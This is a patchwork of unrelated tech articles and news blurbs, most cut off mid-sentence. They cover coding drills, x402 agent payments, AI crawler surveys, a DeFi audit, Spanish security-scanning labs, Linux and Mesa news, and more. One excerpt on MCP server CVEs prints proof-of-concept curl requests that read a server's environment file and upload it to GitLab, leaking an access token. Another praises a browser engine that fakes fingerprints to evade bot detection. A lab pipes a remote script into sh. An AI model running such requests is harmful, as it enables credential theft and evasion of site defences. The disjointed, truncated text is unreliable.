I used to read a solution, nod, and move on. A week later I could not write the same thing from scratch. Understanding something while it is on the screen and being able to produce it yourself are different skills, and only the second one helps in an interview or on a real project. That is why I built Daily Coding, a free web app of short drills for JavaScript/TypeScript, SQL and page building. Each drill is small enough to finish in a minute or two. You answer it, and if you get it right it comes back later. If you get it wrong, it comes back sooner. Repetition is the whole idea: the same basics, seen again until you stop having to think about them. When you answer wrong, you do not just see the correct answer. You get a hint first, so you can have another go. If you are still stuck, you get a step-by-step explanation of how to reach the answer. Here is the kind of problem I mean: const result = [1, 2, 3] .map(n => n * 2) .filter(n => n > 2); console.log(result); What does this print? The answer is [4, 6]. A wrong answer here is usually [2, 3] or [6], which comes from mixing up the order of the two steps. The hint would say "check which method runs first". The explanation walks through it: map doubles every item, giving [2, 4, 6]. filter keeps items greater than 2, so 2 is dropped. The result is [4, 6]. Nothing here is advanced. That is the point. These are the basics people say they know, and then hesitate over when typing them without help. It is a test version, so I would like to hear what is wrong with it: Are the drills the right size, or too easy or too fiddly? Do the explanations actually help, or do they just restate the answer? Which basics are missing that you would want to practise? If you have been coding for years, do the drills feel honest, or are any of them misleading? You can try it here: https://daily-coding-drills.netlify.app It is free and has no ads. Tell me what you think in the comments.
A small SaaS should choose a hosted metrics dashboard API by testing whether it can preserve four incident signals across a rollback: request outcomes, latency, queue age, and deployment identity. The cheapest-looking chart is irrelevant if a reverted release changes labels, duplicates counters, or erases the boundary between the faulty version and the recovery. Start with the retention bill, keep the evidence needed to reconstruct a customer-support incident, and treat charts and alerts as replaceable views over that evidence. Short answer: send bounded, versioned metrics from the application, retain enough regional and deployment context to compare US and EU behavior, and evaluate any hosted service through export, replay, and rollback drills. Do not let the dashboard become the only audit trail. For custom application metrics, the dominant term is usually not the number of attractive charts. It is the number of time series retained over time: every metric name combined with every distinct label set produces another series. A support endpoint labeled by region, operation, outcome, and release stays bounded; adding customer_id, ticket_id, or raw error text makes its cardinality track business activity and defeats a predictable retention plan. Put numbers on the design before choosing an API. Consider an explicit planning model, not a benchmark: 4 signals, 2 regions, 6 operations, 3 outcomes, and 2 simultaneously relevant releases produce at most 288 active combinations. A customer identifier with 10,000 possible values would multiply the model into millions of combinations. The exact storage charge depends on the service, aggregation, scrape or push interval, and retention policy, but the architectural result does not: bounded dimensions are suitable for metrics; incident-specific identity belongs in a durable event record. For a small Node.js SaaS backed by Postgres, the runtime and database do not change that arithmetic; they change where the durable event can be
x402 Agent Spending Guard: Give Your Agent a Budget Before You Give It a Wallet On September 30, 2026, x402-seatbelt shipped — a free, open-source, zero-dependency npm package (plus a Python version, agentseatbelt on PyPI) that checks every x402 payment before it leaves your machine: budget cap, per-payment cap, emergency stop, and an optional Pay Safe verdict (GO / CAUTION / STOP). The justification is first-party monitor data from the author's own paid-x402-API monitor: of 27,499 endpoints tracked on September 30, 2026, 2,777 failed their last health check and 1,495 charged more than their own directory listing. (Source: dev.to/gntechtools) This isn't a one-off — the ecosystem landed the same answer this week from six directions: Guard Enforces x402-seatbelt (Sept 30) maxTotalUsd + maxPaymentUsd, parallel reservations, stop(), Pay Safe GO/CAUTION/STOP StableCoinManager / ERPC (Sept 25–27) Ceilings enforced in code; agent can only LOWER limits at runtime; fails closed; paid a real 1.21 EURC invoice on Base x402-agent-wallet (mid-Sept) $1/day, $0.10/request max, $0.05 approval threshold; only settled spends consume budget; HMAC-signed verdicts thebuyside-x402-agent (mid-Sept) $0.05/call, $1/day rolling, host allowlist, confirm-before-pay default x402 Foundation @x402/mcp (Sept 24) spendControls, $1 default cap, policies filter before wallet signs Countersign @countersign/x402 (Sept 18) Pre-flight allow/deny/needs_approval; decides, never signs The mental model: the guard answers "can we afford it" (fail-closed rules). The decision gate answers "should it happen at all" (confidence scoring → auto-pay / human confirm / block + escalate). Notice the guards already speak the gate: x402-agent-wallet's $0.05 approval threshold IS the confirm band. Pay Safe CAUTION IS the confirm band. Countersign's needs_approval is the confirm band. We ran both sides through our live decision gate tonight: Legit $0.03 whitelisted payment → 0.0714 → escalate $2.50 retry-loop attack (50x o
Everyone keeps asking me if they should block ChatGPT from their website. So I went and looked at what businesses in Houston are actually doing, and the answer surprised me: almost nobody is blocking AI. Their sites just aren't built in a way AI can read. Here's what I did and what I found. The full dataset is public if you want to poke at it [links at the bottom]. I pulled every business in the Houston metro that lists a website in OpenStreetMap, deduped by domain, and ended up with 3,014 sites. Anything sharing a domain across 3 or more locations got treated as a chain, which left 2,474 independents. For each site the crawler fetched three things, once: robots.txt, llms.txt, and the homepage. It identified itself with its own user agent and skipped any site whose robots.txt told it to stay out. It runs on a Cloudflare Worker with HTMLRewriter, which streams the HTML so attribute order doesn't matter and a heavy page doesn't blow up memory [I cap it at 1.5 MB]. Four checks made up what I call the "AI-ready basics": robots.txt lets the AI search crawlers in (OAI-SearchBot, ChatGPT-User, Claude-SearchBot, PerplexityBot, plus Googlebot and Bingbot since they feed AI Overviews and Copilot) at least 120 words of readable text in the raw HTML, before any JavaScript runs some kind of business schema in JSON-LD (LocalBusiness, Organization, etc) exactly one H1 31% pass all four 45% have no business schema at all 27% have no H1 19% show under 120 words before JavaScript runs (restaurants: 33%) 30% already serve an llms.txt, and several are clearly plugin-generated [one literally says "Generated by Rank Math SEO"] Chains weren't any better: 29% pass all four. Only 1.6% of independents block an AI search crawler in robots.txt. I evaluated rules per crawler token for the homepage path using RFC 9309 longest-match, so a site that blocks /search but not / doesn't count as blocked. Training-only tokens (GPTBot, ClaudeBot, Google-Extended, CCBot) are reported separately, since blo
Protocol Upgrade Compatibility Review: Sky Lending Target Protocol: Sky Lending (TVL: $5883.8M) Protocol Upgrade Compatibility Review – Sky Lending TVL: ≈ $5.88 B (Ethereum + L2s) Date of Review: 4 Oct 2026 Prepared by: [Your Name], Senior DeFi Security Researcher & Smart‑Contract Auditor Sky Lending is a high‑value, cross‑chain lending platform that aggregates liquidity across Ethereum L1 and several L2 roll‑ups (Optimism, Arbitrum, zkSync). The protocol’s core contracts are upgradeable via a Transparent Proxy (EIP‑1967) pattern controlled by a multi‑sig DAO (4‑of‑7). The purpose of this review was to assess upgrade compatibility – i.e., whether future contract upgrades can be performed safely without breaking existing state, exposing new attack surfaces, or violating the protocol’s economic guarantees. Area Verdict Critical Issues Overall Impact Proxy & Storage Layout ✅ Acceptable, but 2 high‑severity incompatibilities detected 1️⃣ Storage slot collision in InterestRateModelV2; 2️⃣ Un‑initialized storage gap in RewardsDistributor High – could corrupt user balances or reward accruals on upgrade Governance & Timelock ✅ Robust, but 1 medium‑severity governance bypass 3️⃣ “EmergencyPause” function callable by any address with PROPOSER_ROLE due to missing onlyGovernor guard Medium – could be abused to freeze the protocol during an upgrade Cross‑Chain Bridge Integration ✅ Well‑abstracted, but 1 low‑severity replay‑attack vector 4️⃣ Missing chainId check in BridgeExecutor when processing L2→L1 messages after upgrade Low – limited to bridge relayers Upgrade Authorization Logic ✅ Multi‑sig DAO, but 1 medium‑severity “upgrade‑to‑self” risk 5️⃣ Proxy admin can be set to a contract that itself is upgradeable, enabling a “self‑destruct‑upgrade” path Medium – could lead to loss of upgrade control Testing & Formal Verification ✅ Good coverage, but 1 medium‑severity gap 6️⃣ No invariant test for “totalSupply == sum(userDeposits + accruedInterest)” after upgrade Medium – could hid
Between Monday morning and Tuesday night this week, four Model Context Protocol servers published CVE records for the same basic failure: every tool they expose is reachable with no authentication. A GitLab server that reads any file on its host and uploads it wherever the request asks. A gateway that runs a program chosen by whoever can POST to it. A MySQL tool that hands its database and filesystem to the network. And an IBM sandbox whose escape comes down to two string concatenations. NVD published all four records in roughly 35 hours. I write about MCP security most weeks. On Tuesday I published a plain-language primer on the attack classes (What Is MCP Security? Common Attacks and How to Scan Your MCP Servers), and my working theory has been that the protocol's real risk lives in defaults, not in exotic prompt injection. This week read like a validation set. I pulled all four NVD records, the GitHub advisories, and the fix commits this morning, and as of publish time I found zero writeups on Hacker News or Dev.to for any of the four. A fifth record belongs in this story: LiteLLM's MCP authentication bypass has been on CISA's KEV list since September 2 and is, per CISA's coordinator scoring, under active exploitation. Here is the first one, in the advisory's own request shape: # From GHSA-cv3r-c5h8-f4g5 (CVE-2026-61560), request shape simplified from the # advisory's own PoC. Run against hosts you own only. # 1. Connect to the SSE endpoint and capture a session id. No auth required. curl -N http://target:3002/sse # 2. Ask the server to read any local file and upload it into a GitLab project. curl -X POST "http://target:3002/messages?sessionId= " \ -d '{"tool": "upload_markdown", "args": {"file_path": "/proc/self/environ"}}' # 3. Retrieve the upload from the GitLab project. The environment file contains # GITLAB_PERSONAL_ACCESS_TOKEN, which is the whole GitLab account. No login screen. No exploit code I had to write. The file read is a feature the tool advertises
En los laboratorios analizamos el código de una aplicación con SonarCloud, gosec, el analizador Para demostrar que la herramienta funciona de verdad, la aplicamos a una 17 hallazgos, cinco de ellos de severidad alta. gosec analiza el código buscando patrones que se sabe que son peligrosos: credenciales o claves privadas escritas en el fuente comandos del sistema construidos con variables rutas de archivo tomadas de entrada externa algoritmos de hash débiles consultas SQL por concatenación de cadenas redirecciones y plantillas construidas con datos del usuario Cada regla tiene un identificador (G###), una severidad y un CWE asociado, curl -sSfL https://raw.githubusercontent.com/securego/gosec/master/install.sh | sh gosec -no-fail -fmt=json -out=informe.json ./... Un detalle que puede arruinar el resultado: gosec necesita el compilador de Go Files: 0, lo que parece un Es un servidor web pequeño, en un solo archivo, con seis rutas. Cada una contiene Ruta Fallo introducido /saludo plantilla HTML sin escapar y redirección con datos del usuario /descarga escritura en ruta construida sin restringir /archivo lectura de archivo con ruta de la petición /token secreto concatenado sin validar /tipo comando del sistema con valor del usuario /hash MD5 y SHA1 para derivar contraseñas No está publicada en ningún servicio y no debe usarse con datos reales. Es un Resultado real de gosec -no-fail -fmt=json: Severidad Regla Línea Hallazgo HIGH G101 30 Credencial escrita en el código HIGH G101 33-35 Clave privada RSA embebida HIGH G702 39 Inyección de comandos por análisis de taint HIGH G703 45 Recorrido de rutas por análisis de taint HIGH G703 51 Recorrido de rutas por análisis de taint MEDIUM G112 138-143 Slowloris: falta ReadHeaderTimeout MEDIUM G202 56 Concatenación de cadenas en SQL MEDIUM G204 39 Subproceso lanzado con variable MEDIUM G304 45 Inclusión de archivo vía variable MEDIUM G401 70-71 Primitiva criptográfica débil MEDIUM G401 70 Primitiva criptográfica débil MEDIUM G501 1
En los laboratorios anteriores revisamos el código con SonarCloud, Snyk y las dependencias. La herramienta es OWASP Dependency-Check, Cuando escribes dotnet add package Npgsql.EntityFrameworkCore.PostgreSQL, lo Una dependencia vulnerable no se ve leyendo tu repositorio. Se ve consultando El proyecto de ejemplo es una API en ASP.NET Core 8 con PostgreSQL. Su grafo de 20 paquetes transitivos: Microsoft.EntityFrameworkCore 8.0.10 Npgsql.EntityFrameworkCore.PostgreSQL 8.0.10 Microsoft.AspNetCore.Authentication.JwtBearer 8.0.10 Swashbuckle.AspNetCore 6.9.0 Microsoft.IdentityModel.Tokens 7.1.2 Npgsql 8.0.5 System.Collections.Immutable 6.0.0 ... (14 más) La herramienta de NuGet consulta esa misma base de vulnerabilidades: dotnet list TaskFlow.Api/TaskFlow.Api.csproj package \ --include-transitive --vulnerable Resultado: The given project `TaskFlow.Api` has no vulnerable packages given the current sources. Cero vulnerabilidades conocidas en el grafo completo, incluidas las Dependency-Check hace lo mismo pero con su propia base de datos, que es la dependency-check --project "TaskFlow API" \ --scan TaskFlow.Api \ --out informes/dependencias \ --format HTML --format SARIF \ --failOnCVSS 7 Dos diferencias con la herramienta de NuGet: La base es de la OWASP, no de NuGet. NuGet solo conoce los paquetes que él Puede generar SARIF, que GitHub interpreta y muestra anotado en el pull La base de avisos de la NVD contiene, a la fecha, más de 400.000 registros. https://nvd.nist.gov/developers/request-an-api-key Las ejecuciones siguientes usan la copia en caché. Por eso el escaneo va - name: OWASP Dependency-Check run: | dependency-check \ --project "TaskFlow API" \ --scan TaskFlow.Api \ --out ./informes/dependencias \ --format HTML \ --format SARIF \ --data ~/.gradle/caches \ --failOnCVSS 7 Tres decisiones: --failOnCVSS 7. El escenario falla solo ante vulnerabilidades altas o --format SARIF. El resultado se sube a GitHub Security y aparece anotado Ejecución semanal. La base de avisos ca
In the early hours of Thursday, Singapore time, a repository appeared under the browser-use organization with the description "i. am. speed." By early Friday afternoon it had 2,829 stars and 160 forks, still climbing between two API reads I made minutes apart. Its entire commit history is two commits, by one person. Around it, more than twenty new repositories with jev or typesafe in the name appeared within roughly 48 hours, and a few of them were created before the demo repo they orbit. I pulled the GitHub API on the canonical repo and every derivative I could enumerate, because Dev.to already had seven Jev explainers this morning and none of them reads the wave itself. I maintain a small MCP security scanner and recently wrote about a fake ecosystem engineered to pass the ninety-second vetting ritual we run on repo pages, so star counts as evidence is a professional interest. Here is the five-check routine I ran, what it found, and what it could not settle. # Check 1 and 2 in one call: age versus velocity, then who built it. # Run against any repo in a wave, no token needed for public repos. curl -s https://api.github.com/repos/browser-use/jev-ultrafast \ | python3 -c " import json, sys r = json.load(sys.stdin) print(r['created_at'], '|', r['stargazers_count'], 'stars,', r['forks_count'], 'forks,', r['open_issues_count'], 'issues') " # Observed 2026-09-18, 13:15 SGT: # 2026-09-16T21:30:12Z | 2829 stars, 160 forks, 19 issues That one command is most of the work. The other checks are what you do with the answer. The wave is two things sharing one name. TypeSafe's Jev is a model, launched to a Hacker News thread that reached 1,863 points and 491 comments. jev-ultrafast is a demo agent built on top of it by Gregor Zunic, one of the browser-use founders, and published under the browser-use organization. The thread is the marketing event; the repo is the artifact you can actually read. The README is short and mostly mechanics, which I appreciated. A browser agent usual
Daily requests from AI agents on Cloudflare's network grew by more than 1,700% over the past year, and for the first time more than half the traffic Cloudflare carries is not human (Source: Cloudflare, 2026). Every one of those requests needs a browser session to land in, and almost none of the work that made models reliable in 2024 touched that layer. The bottleneck moved below the model. A human audit published this week walked all 165 tasks of WebArena-Lite under six conditions and found that automatic evaluators missed between 5.45 and 8.49 percentage points of real task success (Source: arXiv, 2026). The same paper then read the 102 failed trajectories and found the failures were not reasoning failures at all. They were scrolling loops, expired sessions, clicks that never landed, and half-filled forms (Source: arXiv, 2026). Give the agent better execution state and a procedural guide, and corrected success on those tasks moved from 34.55% to 38.18% (Source: arXiv, 2026). Memory scaffolding alone lifted an untrained 9B model from 13.90% to 18.80% (Source: arXiv, 2026). None of those gains came from a smarter model. They came from the agent keeping track of where it was. The gap exists because identity is not a property of your code. A page inspecting a session sees a screen size, a GPU string, a font list, a timezone, a language, a TLS handshake signature, and an event stream. A patched browser engine decides those values inside the engine, where a page cannot tell a reported value from a faked one (Source: GitHub, 2026). That is why the open-source agent stacks arriving this autumn ship browsers rather than wrappers. The popular one patches a real Firefox engine in C++, keeps one coherent identity per seed so screen, fonts, GPU, timezone, and language agree, and leaves nothing for a page to find: no WebDriver flag, no DevTools protocol, no automation globals (Source: GitHub, 2026). It still accepts any model through a one-line switch, because the model was neve
Introdução Testar um sistema não é apenas “rodar o programa e ver se não quebrou”. Formalmente, testes de software é o processo de avaliar um sistema para encontrar diferenças entre o comportamento esperado e o real, e construir confiança de que o sistema faz o que deveria fazer. Duas noções que não podem ser confundidas: Verificação: Are we building the product right? O software está de acordo com a especificação/design? É o território dos testes técnicos (unitários e integração) Validação: Are we building the right product? O software resolve o problema real do negócio? É o território de aceitação, UAT, testes exploratórios. Usando um caso real de testes para entender as duas noções na prática: GetDiferencaDataEmMeses_DeveRetornarDiferencaCorreta Verificação: a função implementa corretamente a regra de cálculo de diferença em meses. Validação: confirmar com a área de negócio que essa métrica é, de fato, a correta para aquele cálculo de benefício, o teste automatizado sozinho não garante isso. Por que testamos: o custo crescente do erro O argumento central é econômico: o custo de corrigir um defeito cresce exponencialmente quanto mais tarde ele é descoberto (o clássico "custo crescente do erro", popularizado por Boehm). No domínio do usuário (BPO previdenciário/fiscal): um bug no cálculo de GetDiferencaAnos (que define elegibilidade a um benefício) encontrado por um teste unitário custa minutos. O mesmo bug encontrado em produção pode significar cálculo errado de benefício para centenas de participantes, retrabalho manual, risco regulatório (e-Financeira é fiscalização da Receita Federal) e dano de confiança. Os três pilares de todo teste Testar é uma atividade de equilíbrio entre três forças: Correção: o sistema faz o que deveria fazer. Confiança: o quanto a suíte de testes permite mudar o código sem medo. Esse é o verdadeiro ROI de testes: não é "achar bugs", é permitir mudança segura. Custo: tempo para escrever, rodar e manter os testes. Testes mal escritos (frá
This devlog showcases my Blueprint-based sprint and stamina system and its integration with the player’s health and thirst. Hydration decreases at a normal rate while walking. Sprinting consumes stamina and accelerates hydration loss, giving faster movement an additional resource cost. Once stamina is depleted, the extra hydration drain from sprinting stops, while the normal drain continues. If hydration reaches zero, the player begins losing health. These connected systems make resource management part of traversal. Players need to balance speed with their physical condition, using drinks to restore hydration and medkits to recover health. The UI tracks each stat and highlights critical levels, providing clear feedback as resources run low. https://youtu.be/_LT4jW5UfkU
Robin Winters · October 3, 2026 · Native iOS engineering and fitness technology This standalone teaching example and article were prepared with coding-assistant support. The events are synthetic. The code is separate from ShowFlex, whose shipped iPhone product is available on the App Store. A search controller can correctly reject stale requests while its view adapter still publishes the wrong state. The useful question is not only whether the controller owns its result: it is whether the task waiting for that result still owns the screen. The public controller already checks a revision before publishing success, failure or cleanup. Its new native SwiftUI demo makes the surrounding adapter explicit. It searches three synthetic fitness-event titles, selects by identifier and exposes clear, cancel, error/retry and a deliberately troublesome request race. The controller has plain state properties. The adapter conforms to ObservableObject, publishes the state the interface reads and owns the controller. The view holds the adapter with @StateObject. These are established SwiftUI state-object and Combine observable-object mechanisms; this example uses them to preserve the declared iOS 16 minimum. Starting a search immediately copies the controller's loading state, empty results and cleared selection. When the returned task settles, the adapter copies the completed state only if its own version still matches the version captured when it started waiting: version += 1 let ownedVersion = version let pending = controller.search(query) publish() Task { [weak self] in await pending?.value guard let self, self.version == ownedVersion else { return } self.publish() } This excerpt shows the ownership rule; the full source also handles an empty query before creating the waiting task. The adapter version protects its activity text and state-copying path. The controller revision protects the underlying results. The two checks sit at different boundaries. The Race demo control starts a
How to Monetize an MCP Server: Per-Call x402 Payments (With Live Receipts) There are 20,000+ MCP servers in the wild and fewer than 5% have any monetization. The guides that rank for "how to monetize an MCP server" are vendor pitches, Stripe subscription tutorials, or marketing calculators — none shows a live payment receipt. Here's the receipt-first version. I run ScriptMasterLabs; we bill x402 on our MCP/HTTP tool infra on Base. Per-call x402 billing: your server answers each unpaid tool call with a 402 Payment Required challenge carrying price, asset, network, payTo address, and expiry. The agent's wallet signs the payment authorization, retries the same call, and a facilitator verifies and settles it on-chain. No accounts, no API keys, no checkout pages. Receiving a challenge costs the caller nothing. 1. The x402 payment manifest: curl https://squeezeos-api.onrender.com/.well-known/x402 Returns a live machine-readable contract: operator SCRIPTMASTERLABS, network eip155:8453 (Base), asset USDC (0x833589fCD6eDb6E08f4c7C32D4f71b54bdA02913), payTo 0xc29185fa176357612f3194735753e520e91adc46, facilitator https://api.cdp.coinbase.com/platform/v2/x402, challenge header PAYMENT-REQUIRED, MCP endpoint https://squeezeos-api.onrender.com/mcp, identity registered on the ERC-8004 agent registry (agent id 74033). Verified live September 22, 2026. 2. A live MCP handshake: curl -X POST https://mcp-x402.onrender.com/mcp \ -H 'Content-Type: application/json' \ -H 'Accept: application/json, text/event-stream' \ -d '{"jsonrpc":"2.0","id":1,"method":"initialize","params":{"protocolVersion":"2025-03-26","capabilities":{},"clientInfo":{"name":"probe","version":"0"}}}' Answers with serverInfo: {"name": "mcp-x402", "version": "2.1.11"} and tool capabilities live. On tools/call without a payment credential, return the payment terms — JSON-RPC error data on the MCP transport, or 402 + PAYMENT-REQUIRED header over HTTP. Verify the buyer's signature through a facilitator (ours points at the
The motion design industry is accustomed to relying on established formats: Lottie, Rive, video, or frame sequences (PNG/GIF). However, when attempting to transfer these solutions to widgets (specifically for the Homescreen, Lockscreen, and Live Activities in iOS), engineering teams hit a fundamental technical barrier. The core problem does not lie in system-level prohibitions against dynamics. The error stems from attempting to use resource-heavy media formats and third-party rendering engines in an environment where device architecture strictly demands lightweight, declarative code. Trying to force standard animations into widgets inevitably leads to application crashes, severe device overheating, or outright rejections during the App Store moderation process. The WidgetKit architecture in the Apple ecosystem is designed around strict resource constraints to preserve device autonomy. Integrating standard asset files violates these boundaries for several structural reasons. Simulating animation through rapid frame switching is one of the most common architectural mistakes. A widget operates under a very strict RAM allocation limit. Loading dozens or hundreds of high-resolution images instantly overflows this memory stack. The operating system reacts by triggering a Jetsam Event—forcibly terminating the process to free up memory. As a result, users are left staring at a frozen or entirely blank screen instead of the widget interface. Popular platforms like Lottie and Rive operate by parsing files and rendering them through UIKit and CoreAnimation components. The WidgetKit architecture physically does not support these layers. Widgets are built exclusively on the declarative SwiftUI framework. It is systematically impossible to embed a third-party rendering engine on the iOS Homescreen—such code will simply fail to compile for the widget target. Using built-in video players or hidden web views to play media on widgets is actively blocked by the operating system. Even
I just sent the September edition of my sponsors-only monthly newsletter . If you are a sponsor (or start a sponsorship now) you can access it here . This month: More Fable class models A pricing war 3D graphics, Blender, and pixel art LLMs come for mathematics So many more accidental cyberattacks The vulnapocalypse comes for Datasette What I'm using right now My software releases this month 2026 in LLMs (so far) Here's a copy of the August newsletter as a preview of what you'll get. Pay $10/month to stay a month ahead of the free copy! Tags: newsletter
Over the past year Timur Kristóf of Valve's Linux graphics driver team has made multiple very nice improvements to the AMDGPU kernel driver for enhancing support for old (GCN 1.0/1.1 era from a decade ago) graphics cards so that they can better handle Linux gaming and other tasks. This week in Toronto, Kristóf presented on this AMDGPU work that he initially began as a kernel driver development exercise after initially spending years in user-space focused on the Mesa 3D driver code...
Linaro engineer Vincent Guittot sent out a set of patches on Friday working on scheduling latency improvements, especially when multiple short slice tasks are running concurrently on the same system...
Version 0.17 of the Zig programming language has been released. This release features 5 months of work: changes from 206 different contributors, spread among 925 commits. Originally predicted to be shorter, this release cycle ended up [being] substantial, with the Build System reworked, including the introduction of the Build Server Protocol, and the ELF Linker enhanced to the point where we expect Incremental Compilation to work for everyone on x86_64-linux. LWN last covered Zig in December 2025.
KosmicKrisp is the effort led by LunarG for developing a modern Vulkan-on-Metal driver for Apple systems within Mesa. This modern alternative to MoltenVK continues progressing well and now enjoys Vulkan 1.4 conformance and its performance continues inching closer to that of the native Apple Metal API...
A backend engineer connects Search Console to ChatGPT through MCP and turns early SEO data into a daily experiment loop instead of a content churn machine.
We are nearing the point of the Wine 12.0 stable release coming up in early 2027 while for now the Wine 11.xx bi-weekly development releases continue. Out today is Wine 11.19 with a few new features and plenty of fixes...
Meta now lets you make your own Muse gadgets that feature the company's new AI agent with code that the company open sourced. The company suggests projects like loading Muse on a color E Ink display to show reminders, adding it to an HDMI stick so you can display Muse on a big screen, or putting Muse on a small touchscreen device to make what looks kind of like a DIY Muse Charm. "Muse gadgets are open source devices you build yourself," Meta says. "Program an off-the-shelf ESP32 board or set up a Raspberry Pi with our SDKs, then connect Muse to your displays, buttons, sensors, actuators, and whatever else you've got lying on your workbench. … Read the full story at The Verge.
Ubuntu developer Gianpiero Carpinelli at Canonical has been working on introducing SHA3-256 and SHA3-384 support for Debian's APT packaging tool in preparing for if/when that SHA2 is broken...
We just published a comprehensive, free Kotlin course on the freeCodeCamp.org YouTube channel. Whether you're targeting Android development, scalable backend services, or cross-platform applications,
Rust has a number of kinds of smart pointers, both in the standard library and defined by users. Still, some operations that are possible with built-in references are not possible to perform with user-defined smart pointers. Tyler Mandry, lead of the Rust project's language team, spoke at RustConf 2026 about the lengthy effort to change that, and make smart pointers just as flexible as built-in references.
Every website gets feedback, and most of it ends up somewhere awkward. A visitor finds a broken button and emails you. Someone else leaves a comment on social media about a page that won't load on the
The Linux Test Project has announced its latest stable release for September 2026. There have been 382 patches from 41 authors since the May 2026 release. See the announcement for a list of new tests, changes, and more.
The newest systemd component being worked on and drafted for an initial pull request is systemd-appd as a new mechanism to centralizing the tracking of user's apps...
Imagination Tech was at XDC 2026 Toronto this week to talk up their ongoing work around their PowerVR Mesa Vulkan driver (and PVR upstream DRM kernel driver) with this driver continuing to improve, plans for supporting their new Volcanic GPU architecture, and other improvements...
Tools like Lovable, Bolt, and v0 feel a bit like magic the first time you use them. Honestly, I was shocked the first time I saw something like that...and you get to do all that from a chat window! It
Canonical engineer Richard Scott McNew published a status update surrounding the Rust programming language efforts in the upcoming Ubuntu 26.10 release. Sequoia PGP is being rolled out to Ubuntu Linux and in a future release may end up replacing OpenPGP...
Apex Compute is the company started in California in 2024 that aims to produce high-efficiency AI accelerators for real-time edge AI inferencing. So far they have an FPGA prototype for licensing and deployment and carries the bold claim of being "20x faster than the NVIDIA Jetson" and at under 10W and one fifth the cost. Making Apex Compute much more interesting to us now is that they are developing an open-source, Mesa-based Vulkan driver for their hardware...
KDE Linux developers have been experimenting with a build of their Linux distribution based on BuildStream to ship as an OS image rather than a set of Arch Linux packages. They are nearing a point soon where they will decide if they will officially ship this BuildStream-based KDE Linux image...
Charts look like a small task on a ticket. Then you open the Recharts docs and remember how much setup every chart needs: a config object for labels and colors, axes, a tooltip, a legend, colors that
Back in 2021 the Direct3D 10 User-Mode Driver "d3d10umd" was introduced as a new Gallium3D state tracker to work as a Windows WDDM UMD driver similar to Windows WARP while leveraging LLVMpipe for better performance. Now five years later the poorly maintained code is removed from the Mesa codebase...
With the vast array of wired and wireless networking drivers within the Linux kernel and range of protocols and other networking features, it's a big expanse of code for AI/LLM agents to analyze and critique. The Linux networking developers have acknowledged being "complete overwhelmed" by the AI/LLM-driven patch activity and bug reports as well as battling against AI slop patches. Even though Linux 7.3 stable won't be out for another three weeks, some networking fixes are already being diverted to the next kernel version...
Building a production-ready mobile application used to require a dedicated team of frontend, backend, and DevOps engineers. With modern AI tools, an individual developer can take an idea from concept
A wake lock is one of the simplest APIs in Android and one of the easiest to misuse. Acquiring one takes a single line of code. Forgetting to release it can keep a phone's CPU awake for hours, drain t
Following yesterday's release of the Qt 6.12 LTS toolkit, The Qt Group today released Qt Creator 21 in beta form as the latest version of their integrated development environment focused on C/C++ as well as Python, JavaScript, and other programming languages...
Version 1.99.0 of the Rust language has been released. Changes this time include support for extern "C" variadic functions, the establishment of functions for obtaining the size and alignment of raw pointers, a number of stabilized APIs, and more.
Longtime ARM Linux maintainer Arnd Bergmann over the past year has been working to clear out a number of old ARM platforms from the mainline kernel tree. With Linux 7.3 many older 32-bit ARM platforms were deprecated and in turn hundreds of kernel drivers orphaned. Now it's on to removing that actual code, which given the amount of entangled code, is itself a challenge...